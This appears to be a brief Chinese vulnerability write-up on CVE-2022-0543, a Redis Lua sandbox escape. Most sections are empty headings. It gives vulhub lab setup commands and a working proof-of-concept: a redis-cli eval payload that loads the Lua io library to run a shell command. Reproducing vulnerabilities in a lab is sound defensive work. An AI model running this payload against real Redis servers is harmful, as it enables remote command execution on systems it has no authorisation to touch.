CVE-2022-0543 Redis 沙盒逃逸漏洞
0x01漏洞概述
0x02知识扩展
0x03风险等级
0x04影响版本
0x5漏洞环境搭建
cd /root/vulhub-master/redis/CVE-2022-0543
docker-compose up -d
0x06漏洞验证
https://help.aliyun.com/document_detail/43849.html
redis-cli -h 192.168.182.129 -p 6379
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("whoami", "r"); local res = f:read("*a"); f:close(); return res' 0
0x07修复建议
0x08参考链接
https://wenku.baidu.com/view/cb85d82293c69ec3d5bbfd0a79563c1ec5dad70e.html
扫一扫,关注我们
联系方式
抖音,关注我们